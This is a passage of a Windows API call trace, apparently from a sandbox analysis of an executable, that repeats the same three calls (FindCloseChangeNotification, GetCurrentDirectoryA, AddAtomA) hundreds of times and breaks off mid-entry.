[0045.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.608] AddAtomA (lpString=0x0) returned 0x0 [0045.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.608] AddAtomA (lpString=0x0) returned 0x0 [0045.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.608] AddAtomA (lpString=0x0) returned 0x0 [0045.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.608] AddAtomA (lpString=0x0) returned 0x0 [0045.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.608] AddAtomA (lpString=0x0) returned 0x0 [0045.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.608] AddAtomA (lpString=0x0) returned 0x0 [0045.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.608] AddAtomA (lpString=0x0) returned 0x0 [0045.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.608] AddAtomA (lpString=0x0) returned 0x0 [0045.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.608] AddAtomA (lpString=0x0) returned 0x0 [0045.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.608] AddAtomA (lpString=0x0) returned 0x0 [0045.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.609] AddAtomA (lpString=0x0) returned 0x0 [0045.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.609] AddAtomA (lpString=0x0) returned 0x0 [0045.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.609] AddAtomA (lpString=0x0) returned 0x0 [0045.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.609] AddAtomA (lpString=0x0) returned 0x0 [0045.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.609] AddAtomA (lpString=0x0) returned 0x0 [0045.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.609] AddAtomA (lpString=0x0) returned 0x0 [0045.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.609] AddAtomA (lpString=0x0) returned 0x0 [0045.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.609] AddAtomA (lpString=0x0) returned 0x0 [0045.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.609] AddAtomA (lpString=0x0) returned 0x0 [0045.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.609] AddAtomA (lpString=0x0) returned 0x0 [0045.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.609] AddAtomA (lpString=0x0) returned 0x0 [0045.609] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.609] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.610] AddAtomA (lpString=0x0) returned 0x0 [0045.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.610] AddAtomA (lpString=0x0) returned 0x0 [0045.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.610] AddAtomA (lpString=0x0) returned 0x0 [0045.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.610] AddAtomA (lpString=0x0) returned 0x0 [0045.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.610] AddAtomA (lpString=0x0) returned 0x0 [0045.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.610] AddAtomA (lpString=0x0) returned 0x0 [0045.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.610] AddAtomA (lpString=0x0) returned 0x0 [0045.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.610] AddAtomA (lpString=0x0) returned 0x0 [0045.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.610] AddAtomA (lpString=0x0) returned 0x0 [0045.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.610] AddAtomA (lpString=0x0) returned 0x0 [0045.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.610] AddAtomA (lpString=0x0) returned 0x0 [0045.610] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.610] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.610] AddAtomA (lpString=0x0) returned 0x0 [0045.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.611] AddAtomA (lpString=0x0) returned 0x0 [0045.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.611] AddAtomA (lpString=0x0) returned 0x0 [0045.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.611] AddAtomA (lpString=0x0) returned 0x0 [0045.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.611] AddAtomA (lpString=0x0) returned 0x0 [0045.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.611] AddAtomA (lpString=0x0) returned 0x0 [0045.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.611] AddAtomA (lpString=0x0) returned 0x0 [0045.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.611] AddAtomA (lpString=0x0) returned 0x0 [0045.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.611] AddAtomA (lpString=0x0) returned 0x0 [0045.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.611] AddAtomA (lpString=0x0) returned 0x0 [0045.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.611] AddAtomA (lpString=0x0) returned 0x0 [0045.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.611] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.611] AddAtomA (lpString=0x0) returned 0x0 [0045.611] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.612] AddAtomA (lpString=0x0) returned 0x0 [0045.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.612] AddAtomA (lpString=0x0) returned 0x0 [0045.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.612] AddAtomA (lpString=0x0) returned 0x0 [0045.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.612] AddAtomA (lpString=0x0) returned 0x0 [0045.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.612] AddAtomA (lpString=0x0) returned 0x0 [0045.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.612] AddAtomA (lpString=0x0) returned 0x0 [0045.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.612] AddAtomA (lpString=0x0) returned 0x0 [0045.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.612] AddAtomA (lpString=0x0) returned 0x0 [0045.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.612] AddAtomA (lpString=0x0) returned 0x0 [0045.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.612] AddAtomA (lpString=0x0) returned 0x0 [0045.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.612] AddAtomA (lpString=0x0) returned 0x0 [0045.612] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.612] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.613] AddAtomA (lpString=0x0) returned 0x0 [0045.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.613] AddAtomA (lpString=0x0) returned 0x0 [0045.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.613] AddAtomA (lpString=0x0) returned 0x0 [0045.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.613] AddAtomA (lpString=0x0) returned 0x0 [0045.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.613] AddAtomA (lpString=0x0) returned 0x0 [0045.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.613] AddAtomA (lpString=0x0) returned 0x0 [0045.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.613] AddAtomA (lpString=0x0) returned 0x0 [0045.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.613] AddAtomA (lpString=0x0) returned 0x0 [0045.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.613] AddAtomA (lpString=0x0) returned 0x0 [0045.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.613] AddAtomA (lpString=0x0) returned 0x0 [0045.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.613] AddAtomA (lpString=0x0) returned 0x0 [0045.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.613] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.613] AddAtomA (lpString=0x0) returned 0x0 [0045.613] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.614] AddAtomA (lpString=0x0) returned 0x0 [0045.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.614] AddAtomA (lpString=0x0) returned 0x0 [0045.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.614] AddAtomA (lpString=0x0) returned 0x0 [0045.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.614] AddAtomA (lpString=0x0) returned 0x0 [0045.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.614] AddAtomA (lpString=0x0) returned 0x0 [0045.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.614] AddAtomA (lpString=0x0) returned 0x0 [0045.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.614] AddAtomA (lpString=0x0) returned 0x0 [0045.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.614] AddAtomA (lpString=0x0) returned 0x0 [0045.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.614] AddAtomA (lpString=0x0) returned 0x0 [0045.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.614] AddAtomA (lpString=0x0) returned 0x0 [0045.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.614] AddAtomA (lpString=0x0) returned 0x0 [0045.614] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.614] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.615] AddAtomA (lpString=0x0) returned 0x0 [0045.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.615] AddAtomA (lpString=0x0) returned 0x0 [0045.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.615] AddAtomA (lpString=0x0) returned 0x0 [0045.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.615] AddAtomA (lpString=0x0) returned 0x0 [0045.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.615] AddAtomA (lpString=0x0) returned 0x0 [0045.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.615] AddAtomA (lpString=0x0) returned 0x0 [0045.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.615] AddAtomA (lpString=0x0) returned 0x0 [0045.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.615] AddAtomA (lpString=0x0) returned 0x0 [0045.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.615] AddAtomA (lpString=0x0) returned 0x0 [0045.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.615] AddAtomA (lpString=0x0) returned 0x0 [0045.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.615] AddAtomA (lpString=0x0) returned 0x0 [0045.615] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.615] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.615] AddAtomA (lpString=0x0) returned 0x0 [0045.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.616] AddAtomA (lpString=0x0) returned 0x0 [0045.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.616] AddAtomA (lpString=0x0) returned 0x0 [0045.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.616] AddAtomA (lpString=0x0) returned 0x0 [0045.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.616] AddAtomA (lpString=0x0) returned 0x0 [0045.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.616] AddAtomA (lpString=0x0) returned 0x0 [0045.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.616] AddAtomA (lpString=0x0) returned 0x0 [0045.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.616] AddAtomA (lpString=0x0) returned 0x0 [0045.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.616] AddAtomA (lpString=0x0) returned 0x0 [0045.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.616] AddAtomA (lpString=0x0) returned 0x0 [0045.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.616] AddAtomA (lpString=0x0) returned 0x0 [0045.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.616] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.616] AddAtomA (lpString=0x0) returned 0x0 [0045.616] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.617] AddAtomA (lpString=0x0) returned 0x0 [0045.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.617] AddAtomA (lpString=0x0) returned 0x0 [0045.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.617] AddAtomA (lpString=0x0) returned 0x0 [0045.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.617] AddAtomA (lpString=0x0) returned 0x0 [0045.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.617] AddAtomA (lpString=0x0) returned 0x0 [0045.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.617] AddAtomA (lpString=0x0) returned 0x0 [0045.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.617] AddAtomA (lpString=0x0) returned 0x0 [0045.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.617] AddAtomA (lpString=0x0) returned 0x0 [0045.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.617] AddAtomA (lpString=0x0) returned 0x0 [0045.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.617] AddAtomA (lpString=0x0) returned 0x0 [0045.617] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.617] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.617] AddAtomA 